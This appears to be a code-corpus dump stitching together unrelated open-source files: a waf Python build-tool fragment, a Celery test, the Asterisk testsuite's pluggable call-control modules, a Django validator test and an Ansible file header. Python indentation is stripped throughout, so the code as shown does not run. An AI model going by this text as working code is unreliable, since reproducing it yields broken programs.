conf.fatal('Could not find the python module %r'%module_name)
def detect(conf):
if not conf.env.PYTHON:
conf.env.PYTHON=sys.executable
python=conf.find_program('python',var='PYTHON')
if not python:
conf.fatal('Could not find the path of the python executable')
v=conf.env
v['PYCMD']='"import sys, py_compile;py_compile.compile(sys.argv[1], sys.argv[2])"'
v['PYFLAGS']=''
v['PYFLAGS_OPT']='-O'
v['PYC']=getattr(Options.options,'pyc',1)
v['PYO']=getattr(Options.options,'pyo',1)
def set_options(opt):
opt.add_option('--nopyc',action='store_false',default=1,help='Do not install bytecode compiled .pyc files (configuration) [Default:install]',dest='pyc')
opt.add_option('--nopyo',action='store_false',default=1,help='Do not install optimised compiled .pyo files (configuration) [Default:install]',dest='pyo')
before('apply_incpaths','apply_lib_vars','apply_type_vars')(init_pyext)
feature('pyext')(init_pyext)
before('apply_bundle')(init_pyext)
before('apply_link','apply_lib_vars','apply_type_vars')(pyext_shlib_ext)
after('apply_bundle')(pyext_shlib_ext)
feature('pyext')(pyext_shlib_ext)
before('apply_incpaths','apply_lib_vars','apply_type_vars')(init_pyembed)
feature('pyembed')(init_pyembed)
extension(EXT_PY)(process_py)
before('apply_core')(init_py)
after('vars_target_cprogram','vars_target_cshlib')(init_py)
feature('py')(init_py)
conf(check_python_headers)
conf(check_python_version)
conf(check_python_module)
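# A minimal wscript sketch using this tool (illustrative only; the minimum
# version tuple and the module name below are assumptions, not part of this
# file):
#   def configure(conf):
#       conf.check_tool('python')
#       conf.check_python_version((2, 4, 2))
#       conf.check_python_headers()
#       conf.check_python_module('re')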
| gpl-3.0 |
cbrepo/celery | celery/tests/test_utils/test_utils_info.py | 14 | 1112 | from __future__ import absolute_import
from celery import Celery
from celery.utils import textindent
from celery.tests.utils import Case
RANDTEXT = """\
The quick brown
fox jumps
over the
lazy dog\
"""
RANDTEXT_RES = """\
The quick brown
fox jumps
over the
lazy dog\
"""
QUEUES = {"queue1": {
"exchange": "exchange1",
"exchange_type": "type1",
"binding_key": "bind1"},
"queue2": {
"exchange": "exchange2",
"exchange_type": "type2",
"binding_key": "bind2"}}
QUEUE_FORMAT1 = """. queue1: exchange:exchange1 (type1) binding:bind1"""
QUEUE_FORMAT2 = """. queue2: exchange:exchange2 (type2) binding:bind2"""
class TestInfo(Case):
def test_textindent(self):
self.assertEqual(textindent(RANDTEXT, 4), RANDTEXT_RES)
def test_format_queues(self):
celery = Celery(set_as_current=False)
celery.amqp.queues = celery.amqp.Queues(QUEUES)
self.assertEqual(sorted(celery.amqp.queues.format().split("\n")),
sorted([QUEUE_FORMAT1, QUEUE_FORMAT2]))
| bsd-3-clause |
asterisk/testsuite | lib/python/asterisk/pluggable_modules.py | 1 | 38856 | """Generic pluggable modules
Copyright (C) 2012, Digium, Inc.
Kinsey Moore <[email protected]>
This program is free software, distributed under the terms of
the GNU General Public License Version 2.
"""
import os
import sys
import logging
import shutil
import re
sys.path.append("lib/python")
from .ami import AMIEventInstance
from twisted.internet import reactor
from starpy import fastagi
from .test_runner import load_and_parse_module
from .pluggable_registry import PLUGGABLE_ACTION_REGISTRY,\
PLUGGABLE_EVENT_REGISTRY,\
PluggableRegistry
from . import matcher
LOGGER = logging.getLogger(__name__)
class Originator(object):
"""Pluggable module class that originates calls in Asterisk"""
def __init__(self, module_config, test_object):
"""Initialize config and register test_object callbacks."""
self.ami = None
test_object.register_ami_observer(self.ami_connect)
self.test_object = test_object
self.current_destination = 0
self.ami_callback = None
self.scenario_count = 0
self.config = {
'channel': 'Local/s@default',
'application': 'Echo',
'data': '',
'context': '',
'exten': '',
'priority': '',
'ignore-originate-failure': 'no',
'trigger': 'scenario_start',
'scenario-trigger-after': None,
'scenario-name': None,
'id': '0',
'account': None,
'async': 'False',
'event': None,
'timeout': None,
'codecs': None,
}
# process config
if not module_config:
return
for k in module_config.keys():
if k in self.config:
self.config[k] = module_config[k]
if self.config['trigger'] == 'scenario_start':
if (self.config['scenario-trigger-after'] is not None and
self.config['scenario-name'] is not None):
LOGGER.error("Conflict between 'scenario-trigger-after' and "
"'scenario-name'. Only one may be used.")
raise Exception
else:
test_object.register_scenario_started_observer(
self.scenario_started)
elif self.config['trigger'] == 'event':
if not self.config['event']:
LOGGER.error("Event specifier for trigger type 'event' is "
"missing")
raise Exception
# set id to the AMI id for the origination if it is unset
if 'id' not in self.config['event']:
self.config['event']['id'] = self.config['id']
callback = AMIPrivateCallbackInstance(self.config['event'],
test_object,
self.originate_callback)
self.ami_callback = callback
return
def ami_connect(self, ami):
"""Handle new AMI connections."""
LOGGER.info("AMI %s connected", str(ami.id))
if str(ami.id) == self.config['id']:
self.ami = ami
if self.config['trigger'] == 'ami_connect':
self.originate_call()
return
def failure(self, result):
"""Handle origination failure."""
if self.config['ignore-originate-failure'] == 'no':
LOGGER.info("Originate failed: %s", str(result))
self.test_object.set_passed(False)
return None
def originate_callback(self, ami, event):
"""Handle event callbacks."""
LOGGER.info("Got event callback for Origination")
self.originate_call()
return True
def originate_call(self):
"""Originate the call"""
LOGGER.info("Originating call")
defer = None
if len(self.config['context']) > 0:
defer = self.ami.originate(channel=self.config['channel'],
context=self.config['context'],
exten=self.config['exten'],
priority=self.config['priority'],
timeout=self.config['timeout'],
account=self.config['account'],
codecs=self.config['codecs'],
async=self.config['async'])
else:
defer = self.ami.originate(channel=self.config['channel'],
application=self.config['application'],
data=self.config['data'],
timeout=self.config['timeout'],
account=self.config['account'],
codecs=self.config['codecs'],
async=self.config['async'])
defer.addErrback(self.failure)
def scenario_started(self, result):
"""Handle origination on scenario start if configured to do so."""
LOGGER.info("Scenario '%s' started", result.name)
if self.config['scenario-name'] is not None:
if result.name == self.config['scenario-name']:
LOGGER.debug("Scenario name '%s' matched", result.name)
self.originate_call()
elif self.config['scenario-trigger-after'] is not None:
self.scenario_count += 1
trigger_count = int(self.config['scenario-trigger-after'])
if self.scenario_count == trigger_count:
LOGGER.debug("Scenario count has been met")
self.originate_call()
else:
self.originate_call()
return result
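# A minimal test-config sketch for the Originator module (illustrative only;
# the section name and values are assumptions, while the keys mirror
# self.config above):
#   originator-config:
#       trigger: 'ami_connect'
#       channel: 'Local/s@default'
#       context: 'default'
#       exten: 'echo'
#       priority: '1'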
class AMIPrivateCallbackInstance(AMIEventInstance):
"""Subclass of AMIEventInstance that operates by calling a user-defined
callback function. The callback function returns the current disposition
of the test (i.e. whether the test is currently passing or failing).
"""
def __init__(self, instance_config, test_object, callback):
"""Constructor"""
super(AMIPrivateCallbackInstance, self).__init__(instance_config,
test_object)
self.callback = callback
if 'start' in instance_config:
self.passed = True if instance_config['start'] == 'pass' else False
def event_callback(self, ami, event):
"""Generic AMI event handler"""
self.passed = self.callback(ami, event)
return (ami, event)
def check_result(self, callback_param):
"""Set the test status based on the result of self.callback"""
self.test_object.set_passed(self.passed)
return callback_param
class AMIChannelHangup(AMIEventInstance):
"""An AMIEventInstance derived class that hangs up a channel when an
event is matched."""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(AMIChannelHangup, self).__init__(instance_config, test_object)
self.hungup_channel = False
self.delay = instance_config.get('delay') or 0
def event_callback(self, ami, event):
"""Override of the event callback"""
if self.hungup_channel:
return
if 'channel' not in event:
return
LOGGER.info("Hanging up channel %s", event['channel'])
self.hungup_channel = True
reactor.callLater(self.delay, ami.hangup, event['channel'])
return (ami, event)
class AMIChannelHangupAll(AMIEventInstance):
"""An AMIEventInstance derived class that hangs up all the channels when
an event is matched."""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(AMIChannelHangupAll, self).__init__(instance_config, test_object)
test_object.register_ami_observer(self.__ami_connect)
self.channels = []
def __ami_connect(self, ami):
"""AMI connect handler"""
if str(ami.id) in self.ids:
ami.registerEvent('Newchannel', self.__new_channel_handler)
ami.registerEvent('Hangup', self.__hangup_handler)
def __new_channel_handler(self, ami, event):
"""New channel event handler"""
self.channels.append({'id': ami.id, 'channel': event['channel']})
def __hangup_handler(self, ami, event):
"""Hangup event handler"""
objects = [x for x in self.channels if
(x['id'] == ami.id and
x['channel'] == event['channel'])]
for obj in objects:
self.channels.remove(obj)
def event_callback(self, ami, event):
"""Override of the event callback"""
def __hangup_ignore(result):
"""Ignore hangup errors"""
# Ignore hangup errors - if the channel is gone, we don't care
return result
objects = [x for x in self.channels if x['id'] == ami.id]
for obj in objects:
LOGGER.info("Hanging up channel %s", obj['channel'])
ami.hangup(obj['channel']).addErrback(__hangup_ignore)
self.channels.remove(obj)
class ARIHangupMonitor(object):
"""A class that monitors for new channels and hungup channels in ARI.
This is the same as HangupMonitor, except that it listens over ARI
to avoid any issue with race conditions. Note that it will implicitly
create a global subscription to channels, which may conflict with
tests that don't expect to get all those events.
"""
def __init__(self, instance_config, test_object):
"""Constructor"""
super(ARIHangupMonitor, self).__init__()
self.delay = 0
if 'delay-stop' in instance_config:
self.delay = instance_config['delay-stop']
self.test_object = test_object
self.test_object.register_ari_observer(self._handle_ws_open)
self.test_object.register_ws_event_handler(self._handle_ws_event)
self.channels = 0
def _handle_ws_open(self, ari_receiver):
"""Handle WS connection"""
LOGGER.info(ari_receiver.apps)
for app in ari_receiver.apps.split(','):
self.test_object.ari.post('applications/{0}/subscription?eventSource=channel:'.format(app))
def _handle_ws_event(self, message):
"""Handle a message received over the WS"""
message_type = message.get('type')
if (message_type == 'ChannelCreated'):
LOGGER.info('Tracking channel %s', message.get('channel'))
self.channels += 1
elif (message_type == 'ChannelDestroyed'):
LOGGER.info('Destroyed channel %s', message.get('channel'))
self.channels -= 1
if (self.channels == 0):
LOGGER.info("All channels have hungup; stopping test after %d seconds",
self.delay)
reactor.callLater(self.delay, self.test_object.stop_reactor)
class HangupMonitor(object):
"""A class that monitors for new channels and hungup channels. When all
channels it has monitored for have hung up, it ends the test.
Essentially, as long as there are new channels it will keep the test
going; however, once channels start hanging up it will kill the test
on the last hung up channel.
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(HangupMonitor, self).__init__()
self.config = instance_config
self.test_object = test_object
self.test_object.register_ami_observer(self.__ami_connect)
self.channels = []
self.num_calls = 0
def __ami_connect(self, ami):
"""AMI connect handler"""
if str(ami.id) in self.config["ids"]:
ami.registerEvent('Newchannel', self.__new_channel_handler)
ami.registerEvent('Rename', self.__rename_handler)
ami.registerEvent('Hangup', self.__hangup_handler)
def __new_channel_handler(self, ami, event):
"""Handler for the Newchannel event"""
LOGGER.debug("Tracking channel %s", event['channel'])
self.channels.append(event['channel'])
return (ami, event)
def __hangup_handler(self, ami, event):
"""Handler for the Hangup event"""
LOGGER.debug("Channel %s hungup", event['channel'])
self.channels.remove(event['channel'])
self.num_calls += 1
if 'min_calls' in self.config \
and self.num_calls < self.config["min_calls"]:
return (ami, event)
if len(self.channels) == 0:
LOGGER.info("All channels have hungup; stopping test")
self.stop_test()
return (ami, event)
def __rename_handler(self, ami, event):
LOGGER.debug("Channel {0} renamed to {1}".format(event['channel'],
event['newname']))
self.channels.append(event['newname'])
self.channels.remove(event['channel'])
def stop_test(self):
"""Allow subclasses to take different actions to stop the test."""
self.test_object.stop_reactor()
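# A minimal config sketch for HangupMonitor (illustrative; 'ids' lists the AMI
# instance ids to watch and 'min_calls' is optional; the values shown are
# assumptions):
#   hangup-monitor:
#       ids: ['0']
#       min_calls: 1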
class CallFiles(object):
""" This class allows call files to be created from a YAML configuration"""
def __init__(self, instance_config, test_object):
"""Constructor"""
super(CallFiles, self).__init__()
self.test_object = test_object
self.call_file_instances = instance_config
self.locale = ""
if self.call_file_instances:
self.test_object.register_ami_observer(self.ami_connect)
else:
LOGGER.error("No configuration was specified for call files")
self.test_failed()
def test_failed(self):
"""Checks to see whether or not the call files were
correctly specified """
self.test_object.set_passed(False)
self.test_object.stop_reactor()
def write_call_file(self, call_file_num, call_file):
"""Write out the specified call file
Keyword Parameters:
call_file_num Which call file in the test we're writing out
call_file A dictionary containing the call file
information, derived from the YAML
"""
params = call_file.get('call-file-params')
if not params:
LOGGER.error("No call file parameters specified")
self.test_failed()
return
self.locale = ("%s%s/tmp/test%d.call" %
(self.test_object.ast[int(call_file['id'])].base,
self.test_object.ast[int(call_file['id'])].directories
["astspooldir"], call_file_num))
with open(self.locale, 'w') as outfile:
for key, value in params.items():
outfile.write("%s: %s\n" % (key, value))
LOGGER.debug("Wrote call file to %s", self.locale)
self.move_file(call_file_num, call_file)
def ami_connect(self, ami):
"""Handler for AMI connection """
for index, call_file in enumerate(self.call_file_instances):
if ami.id == int(call_file.get('id')):
self.write_call_file(index, call_file)
def move_file(self, call_file_num, call_file):
"""Moves call files to astspooldir directory to be run """
src_file = self.locale
dst_file = ("%s%s/outgoing/test%s.call" %
(self.test_object.ast[int(call_file['id'])].base,
self.test_object.ast[int(call_file['id'])].directories
["astspooldir"], call_file_num))
LOGGER.info("Moving file %s to %s", src_file, dst_file)
shutil.move(src_file, dst_file)
os.utime(dst_file, None)
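# A minimal config sketch for CallFiles (illustrative; the call-file-params
# shown are ordinary Asterisk call file fields and their values are
# assumptions):
#   call-file-config:
#       -
#           id: 0
#           call-file-params:
#               Channel: 'Local/s@default'
#               Application: 'Echo'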
class SoundChecker(object):
""" This class allows the user to check if a given sound file exists,
whether a sound file fits within a range of file size, and has enough
energy in it to pass a BackgroundDetect threshold of silence"""
def __init__(self, module_config, test_object):
"""Constructor"""
super(SoundChecker, self).__init__()
self.test_object = test_object
self.module_config = module_config['sound-file-config']
self.filepath = ""
self.sound_file = {}
self.actions = []
self.index = 0
self.action_index = 0
self.auto_stop = module_config.get('auto-stop', False)
self.test_object.register_ami_observer(self.ami_connect)
def build_sound_file_location(self, filename, path_type, path_name=""):
"""Creates the filepath for the given sound file.
        The file_path_type may be 'relative' or 'absolute'; if it is absolute,
        an absolute_path string must also be supplied. Fails if the path type
        is invalid or parameters are missing.
Keyword Arguments:
        filename: The name of the file to be set and used
        path_type: The type of path - either relative or absolute
        path_name: Optional parameter that must be included with an
                   absolute path_type. It stores the actual file path to be
                   used
returns:
filepath: The filepath that this sound_file test will use.
"""
asterisk_instance = self.module_config[self.index].get('id', 0)
if path_type == 'relative':
ast_instance = self.test_object.ast[asterisk_instance]
base_path = ast_instance.base
spool_dir = ast_instance.directories["astspooldir"]
filepath = ("%s%s/%s" % (base_path, spool_dir, filename))
return filepath
elif path_type == 'absolute':
if path_name:
filepath = "%s/%s" % (path_name, filename)
return filepath
else:
raise Exception("No absolute path specified")
else:
raise Exception("Invalid file path type or undefined path type")
def size_check(self, ami):
"""The size range test.
Checks whether the size of the file meets a certain threshold of
byte size. Fails if it doesn't. Iterates action_index so that the
next action can be done.
Keyword Arguments:
ami- the AMI instance used by this test, not used by this function
but needs to be passed into sound_check_actions to continue
"""
filesize = -1
filesize = os.path.getsize(self.filepath)
size = self.actions[self.action_index].get('size')
tolerance = self.actions[self.action_index].get('tolerance')
if ((filesize - size) > tolerance) or ((size - filesize) > tolerance):
LOGGER.error("""File '%s' failed size check: expected %d, actual %d
(tolerance +/- %d""" % (
self.filepath, size, filesize, tolerance))
self.test_object.set_passed(False)
if self.auto_stop:
self.test_object.stop_reactor()
return
else:
self.action_index += 1
self.sound_check_actions(ami)
def energy_check(self, ami):
"""Checks the energy levels of a given sound file.
This is done by creating a local channel into a dialplan extension
that does a BackgroundDetect on the sound file. The extensions must
be defined by the user.
Keyword Arguments:
ami- the AMI instance used by this test
"""
energyfile = self.filepath[:self.filepath.find('.')]
action = self.actions[self.action_index]
#ami.originate has no type var, so action['type'] has to be popped
action.pop('type')
action['variable'] = {'SOUNDFILE': energyfile}
ami.registerEvent("UserEvent", self.verify_presence)
dfr = ami.originate(**action)
dfr.addErrback(self.test_object.handle_originate_failure)
def sound_check_actions(self, ami):
"""The second, usually larger part of the sound check.
Iterates through the actions that will be used to check various
aspects of the given sound file. Waits for the output of the action
functions before continuing. If all actions have been completed resets
the test to register for a new event as defined in the triggers. If
all sound-file tests have been finished, sets the test to passed.
Keyword Arguments:
ami- the AMI instance used by this test
"""
if self.action_index == len(self.actions):
self.action_index = 0
self.index += 1
if self.index == len(self.module_config):
LOGGER.info("Test successfully passed")
self.test_object.set_passed(True)
if self.auto_stop:
self.test_object.stop_reactor()
else:
self.event_register(ami)
else:
actiontype = self.actions[self.action_index]['type']
if actiontype == 'size_check':
self.size_check(ami)
elif actiontype == 'energy_check':
self.energy_check(ami)
def verify_presence(self, ami, event):
"""UserEvent verifier for the energy check.
Verifies that the userevent that was given off by the dialplan
extension called in energy_check was a soundcheck userevent and that
the status is pass. Fails if the status was not pass. Iterates
action_index if it passed so that the next action can be done.
Keyword Arguments:
ami- the AMI instance used by this test
event- the event (Userevent) being picked up by the AMI that
determines whether a correct amount of energy has been detected.
"""
userevent = event.get("userevent")
if not userevent:
return
if userevent.lower() != "soundcheck":
return
LOGGER.info("Checking the sound check userevent")
ami.deregisterEvent("UserEvent", self.verify_presence)
status = event.get("status")
LOGGER.debug("Status of the sound check is " + status)
if status != "pass":
LOGGER.error("The sound check wasn't successful- test failed")
self.test_object.set_passed(False)
if self.auto_stop:
self.test_object.stop_reactor()
return
else:
self.action_index += 1
self.sound_check_actions(ami)
def sound_check_start(self, ami, event):
"""The first part of the sound_check test. Required.
It deregisters the prerequisite event as defined in triggers so that
it doesn't keep looking for said events. Then it checks whether the
sound file described in the YAML exists by looking for the file with
the given path. The filepath is determined by calling
build_sound_file_location. After this initial part of sound_check,
the remaining actions are then called.
Keyword Arguments:
ami- the AMI instance used by this test
event- the event (defined by the triggers section) being picked up by
the AMI that allows the rest of the pluggable module to be accessed
"""
config = self.module_config[self.index]
instance_id = config.get('id', 0)
if ami.id != instance_id:
return
current_trigger = config['trigger']['match']
for key, value in current_trigger.items():
if key.lower() not in event:
LOGGER.debug("Condition %s not in event, returning", key)
return
if not re.match(value, event.get(key.lower())):
LOGGER.debug("Condition %s: %s does not match %s: %s in event",
key, value, key, event.get(key.lower()))
return
else:
LOGGER.debug("Condition %s: %s matches %s: %s in event",
key, value, key, event.get(key.lower()))
ami.deregisterEvent(current_trigger.get('event'),
self.sound_check_start)
self.sound_file = config['sound-file']
if not self.sound_file:
raise Exception("No sound file parameters specified")
if (not self.sound_file.get('file-name')
or not self.sound_file.get('file-path-type')):
raise Exception("No file or file path type specified")
if self.sound_file.get('absolute-path'):
file_name = self.sound_file['file-name']
file_path_type = self.sound_file['file-path-type']
absolute_path = self.sound_file['absolute-path']
self.filepath = self.build_sound_file_location(file_name,
file_path_type,
absolute_path)
else:
file_name = self.sound_file['file-name']
file_path_type = self.sound_file['file-path-type']
self.filepath = self.build_sound_file_location(file_name,
file_path_type)
#Find the filesize here if it exists
if not os.path.exists(self.filepath):
LOGGER.error("File '%s' does not exist!" % self.filepath)
self.test_object.set_passed(False)
if self.auto_stop:
self.test_object.stop_reactor()
return
self.actions = self.sound_file.get('actions')
self.sound_check_actions(ami)
def event_register(self, ami):
"""Event register for the prerequisite event.
Starts looking for the event defined in the triggers section of the
YAML that allows the rest of the test to be accessed.
Keyword Arguments:
ami- the AMI instance used by this test
"""
current_trigger = self.module_config[self.index]['trigger']['match']
trigger_id = self.module_config[self.index]['trigger'].get('id', 0)
if ami.id != trigger_id:
return
if not current_trigger:
raise Exception("Missing a trigger")
else:
ami.registerEvent(current_trigger.get('event'),
self.sound_check_start)
def ami_connect(self, ami):
"""Starts the ami_connection and then calls event_register
Keyword Arguments:
ami- the AMI instance used by this test
"""
self.event_register(ami)
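# A minimal config sketch for SoundChecker (illustrative; the event match,
# file name and size/tolerance values are assumptions; see
# build_sound_file_location and size_check above for how each key is used):
#   sound-file-config:
#       -
#           id: 0
#           trigger:
#               match:
#                   event: 'UserEvent'
#                   UserEvent: 'RecordingFinished'
#           sound-file:
#               file-name: 'voicemail/1234/INBOX/msg0000.wav'
#               file-path-type: 'relative'
#               actions:
#                   -
#                       type: 'size_check'
#                       size: 80000
#                       tolerance: 10000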
class AsteriskConfigModule(object):
"""A pluggable module that installs an Asterisk config file.
Configuration is as follows:
config-section:
-
id: 0
src: tests/my-test/my-super-awesome.conf
dst: extensions.conf
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(AsteriskConfigModule, self).__init__()
for info in instance_config:
asterisk_instance = test_object.ast[info.get('id', 0)]
asterisk_instance.install_config(info['src'], info['dst'])
class FastAGIModule(object):
"""A class that makes a FastAGI server available to be called via the
dialplan and allows simple commands to be executed.
Configuration is as follows:
config-section:
host: '127.0.0.1'
port: 4573
commands:
- 'SET VARIABLE "CHANVAR1" "CHANVAL1"'
Instead of commands, a callback may be specified to interact with Asterisk:
callback:
module: fast_agi_callback_module
method: fast_agi_callback_method
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(FastAGIModule, self).__init__()
self.test_object = test_object
self.port = instance_config.get('port', 4573)
self.host = instance_config.get('host', '127.0.0.1')
self.commands = instance_config.get('commands')
if 'callback' in instance_config:
self.callback_module = instance_config['callback']['module']
self.callback_method = instance_config['callback']['method']
fastagi_factory = fastagi.FastAGIFactory(self.fastagi_connect)
reactor.listenTCP(self.port, fastagi_factory,
test_object.reactor_timeout, self.host)
def fastagi_connect(self, agi):
"""Handle incoming connections"""
if self.commands:
return self.execute_command(agi, 0)
else:
method = load_and_parse_module(self.callback_module + '.' + self.callback_method)
method(self.test_object, agi)
def on_command_failure(self, reason, agi, idx):
"""Failure handler for executing commands"""
LOGGER.error('Could not execute command %s: %s',
idx, self.commands[idx])
LOGGER.error(reason.getTraceback())
agi.finish()
def on_command_success(self, result, agi, idx):
"""Handler for executing commands"""
LOGGER.debug("Successfully executed '%s': %s",
self.commands[idx], result)
self.execute_command(agi, idx + 1)
def execute_command(self, agi, idx):
"""Execute the requested command"""
if len(self.commands) <= idx:
LOGGER.debug("Completed all commands for %s:%s",
self.host, self.port)
agi.finish()
return
agi.sendCommand(self.commands[idx])\
.addCallback(self.on_command_success, agi, idx)\
.addErrback(self.on_command_failure, agi, idx)
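# A sketch of a user-supplied callback for the 'callback' form shown in the
# class docstring (illustrative; the function name and the AGI command are
# assumptions). The callback receives the test object and the connected
# FastAGI protocol instance:
#   def fast_agi_callback_method(test_object, agi):
#       def on_complete(result):
#           agi.finish()
#       agi.sendCommand('SET VARIABLE "CHANVAR1" "CHANVAL1"')\
#           .addCallback(on_complete)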
class EventActionModule(object):
"""A class that links arbitrary events with one or more actions.
Configuration is as follows:
config-section:
actions:
custom-action-name: custom.action.location
events:
custom-event-name: custom.event.location
mapping:
-
custom-event-name:
event-config-goes-here
custom-action-name:
action-config-goes-here
Or if no locally-defined events or actions are desired:
config-section:
-
event-name:
event-config-goes-here
other-event-name:
event-config-goes-here
action-name:
action-config-goes-here
Or if no locally-defined events or actions are desired and only one set is
desired:
config-section:
event-name:
event-config-goes-here
action-name:
action-config-goes-here
Any event in a set will trigger all actions in a set.
"""
def __init__(self, instance_config, test_object):
"""Constructor for pluggable modules"""
super(EventActionModule, self).__init__()
self.test_object = test_object
config = instance_config
if isinstance(config, list):
config = {"mapping": config}
elif isinstance(config, dict) and "mapping" not in config:
config = {"mapping": [config]}
# Parse out local action and event definitions
self.local_action_registry = PluggableRegistry()
self.local_event_registry = PluggableRegistry()
def register_modules(config, registry):
"""Register pluggable modules into the registry"""
for key, local_class_path in config.items():
local_class = load_and_parse_module(local_class_path)
if not local_class:
raise Exception("Unable to load %s for module key %s"
% (local_class_path, key))
registry.register(key, local_class)
if "actions" in config:
register_modules(config["actions"], self.local_action_registry)
if "events" in config:
register_modules(config["events"], self.local_event_registry)
self.event_action_sets = []
self.parse_mapping(config)
def parse_mapping(self, config):
"""Parse out the mapping and instantiate objects."""
for e_a_set in config["mapping"]:
plug_set = {"events": [], "actions": []}
for plug_name, plug_config in e_a_set.items():
self.parse_module_config(plug_set, plug_name, plug_config)
if 0 == len(plug_set["events"]):
raise Exception("Pluggable set requires at least one event: %s"
% e_a_set)
self.event_action_sets.append(plug_set)
def parse_module_config(self, plug_set, plug_name, plug_config):
"""Parse module config and update the pluggable module set"""
if self.local_event_registry.check(plug_name):
plug_class = self.local_event_registry.get_class(plug_name)
plug_set["events"].append(
plug_class(self.test_object, self.event_triggered, plug_config))
elif self.local_action_registry.check(plug_name):
plug_class = self.local_action_registry.get_class(plug_name)
plug_set["actions"].append(
plug_class(self.test_object, plug_config))
elif PLUGGABLE_EVENT_REGISTRY.check(plug_name):
plug_class = PLUGGABLE_EVENT_REGISTRY.get_class(plug_name)
plug_set["events"].append(
plug_class(self.test_object, self.event_triggered, plug_config))
elif PLUGGABLE_ACTION_REGISTRY.check(plug_name):
plug_class = PLUGGABLE_ACTION_REGISTRY.get_class(plug_name)
plug_set["actions"].append(
plug_class(self.test_object, plug_config))
else:
raise Exception("Pluggable component '%s' not recognized"
% plug_name)
def find_triggered_set(self, triggered_by):
"""Find the set that was triggered."""
for e_a_set in self.event_action_sets:
for event_mod in e_a_set["events"]:
if event_mod == triggered_by:
return e_a_set
return None
def event_triggered(self, triggered_by, source=None, extra=None):
"""Run actions for the triggered set."""
triggered_set = self.find_triggered_set(triggered_by)
if not triggered_set:
raise Exception("Unable to find event/action set for %s"
% triggered_by)
for action_mod in triggered_set["actions"]:
action_mod.run(triggered_by, source, extra)
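# Hedged, illustrative sketch (not part of the original test suite): the
# smallest mapping config EventActionModule accepts, wired to the 'test-start'
# event and 'logger' action registered later in this file; the helper name and
# message text are placeholders.
def _example_event_action_config():
    """Return a sample mapping config accepted by EventActionModule."""
    return [
        {
            'test-start': None,
            'logger': {'message': 'test has started'},
        },
    ]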
class TestStartEventModule(object):
"""An event module that triggers when the test starts."""
def __init__(self, test_object, triggered_callback, config):
"""Setup the test start observer"""
self.test_object = test_object
self.triggered_callback = triggered_callback
self.config = config
test_object.register_start_observer(self.start_observer)
def start_observer(self, ast):
"""Notify the event-action mapper that the test has started."""
self.triggered_callback(self, ast)
PLUGGABLE_EVENT_REGISTRY.register("test-start", TestStartEventModule)
class LogActionModule(object):
"""An action module that logs a message when triggered."""
def __init__(self, test_object, config):
"""Setup the test start observer"""
self.test_object = test_object
self.message = config["message"]
def run(self, triggered_by, source, extra):
"""Log a message."""
LOGGER.info(self.message)
PLUGGABLE_ACTION_REGISTRY.register("logger", LogActionModule)
class ValidateLogActionModule(object):
"""An action module that validates a log files existence."""
def __init__(self, test_object, config):
self.test_object = test_object
self.logfile = config["logfile"]
self.pass_if_present = config["pass-if-present"]
def run(self, triggered_by, source, extra):
"""Check to see if log file is present or not."""
files = []
testpath = ('%s/var/log/asterisk' %
(self.test_object.ast[0].base))
for (dirpath, dirnames, filenames) in os.walk(testpath):
files.extend(filenames)
break
# pass iff the log file's presence matches the expected 'pass-if-present' flag
self.test_object.set_passed(bool(self.logfile in files) == bool(self.pass_if_present))
PLUGGABLE_ACTION_REGISTRY.register("validate-log", ValidateLogActionModule)
class CallbackActionModule(object):
"""An action module that calls the specified callback."""
def __init__(self, test_object, config):
"""Setup the test start observer"""
self.test_object = test_object
self.module = config["module"]
self.method = config["method"]
def run(self, triggered_by, source, extra):
"""Call the callback."""
method = load_and_parse_module(self.module + '.' + self.method)
self.test_object.set_passed(method(self.test_object, triggered_by,
source, extra))
PLUGGABLE_ACTION_REGISTRY.register("callback", CallbackActionModule)
class StopTestActionModule(object):
"""Action module that stops a test"""
def __init__(self, test_object, config):
"""Constructor
Keyword Arguments:
test_object The main test object
config The pluggable module config
"""
self.test_object = test_object
def run(self, triggered_by, source, extra):
"""Execute the action, which stops the test
Keyword Arguments:
triggered_by The event that triggered this action
source The Asterisk interface object that provided the event
extra Source dependent data
"""
self.test_object.stop_reactor()
PLUGGABLE_ACTION_REGISTRY.register("stop_test", StopTestActionModule)
class PjsuaPhoneActionModule(object):
"""An action module that instructs a phone to perform an action."""
def __init__(self, test_object, config):
"""Setup the test start observer"""
self.test_object = test_object
self.module = "phones"
self.method = config["action"]
self.config = config
def run(self, triggered_by, source, extra):
"""Instruct phone to perform action"""
method = load_and_parse_module(self.module + "." + self.method)
method(self.test_object, triggered_by, source, extra, self.config)
PLUGGABLE_ACTION_REGISTRY.register("pjsua_phone", PjsuaPhoneActionModule)
| gpl-2.0 |
etos/django | tests/forms_tests/tests/test_validators.py | 111 | 2210 | import re
from unittest import TestCase
from django import forms
from django.core import validators
from django.core.exceptions import ValidationError
class TestFieldWithValidators(TestCase):
def test_all_errors_get_reported(self):
class UserForm(forms.Form):
full_name = forms.CharField(
max_length=50,
validators=[
validators.validate_integer,
validators.validate_email,
]
)
string = forms.CharField(
max_length=50,
validators=[
validators.RegexValidator(
regex='^[a-zA-Z]*$',
message="Letters only.",
)
]
)
ignore_case_string = forms.CharField(
max_length=50,
validators=[
validators.RegexValidator(
regex='^[a-z]*$',
message="Letters only.",
flags=re.IGNORECASE,
)
]
)
form = UserForm({
'full_name': 'not int nor mail',
'string': '2 is not correct',
'ignore_case_string': "IgnORE Case strIng",
})
with self.assertRaises(ValidationError) as e:
form.fields['full_name'].clean('not int nor mail')
self.assertEqual(2, len(e.exception.messages))
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['string'], ["Letters only."])
self.assertEqual(form.errors['ignore_case_string'], ["Letters only."])
def test_field_validators_can_be_any_iterable(self):
class UserForm(forms.Form):
full_name = forms.CharField(
max_length=50,
validators=(
validators.validate_integer,
validators.validate_email,
)
)
form = UserForm({'full_name': 'not int nor mail'})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors['full_name'], ['Enter a valid integer.', 'Enter a valid email address.'])
| bsd-3-clause |
hyperized/ansible | test/units/modules/network/netvisor/test_pn_vrouter_interface_ip.py | 23 | 2787 | # Copyright: (c) 2018, Pluribus Networks
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
